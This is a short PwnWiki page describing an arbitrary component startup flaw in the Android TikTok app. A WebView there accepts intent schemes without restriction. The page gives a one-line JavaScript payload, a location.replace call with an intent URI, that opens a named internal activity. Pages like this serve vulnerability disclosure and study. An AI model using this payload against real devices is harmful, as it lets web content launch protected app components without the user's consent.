Android version of TikTok arbitrary component startup vulnerability

From PwnWiki
Revision as of 12:58, 10 June 2021 by Pwnwiki (talk | contribs) (Created page with "The good news is that Add Wiki Activity WebView also supports intent schemes without any restrictions. But if the following code is executed in Add Wiki Activity, User Favorit...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Bahasa Indonesia • ‎Chinese • ‎English

The good news is that Add Wiki Activity WebView also supports intent schemes without any restrictions. But if the following code is executed in Add Wiki Activity, User Favorites Activity will be called.

location.replace("intent:#Intent;component=com.zhiliaoapp.musically/com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity;package=com.zhiliaoapp.musically;action=android.intent.action.VIEW;end;")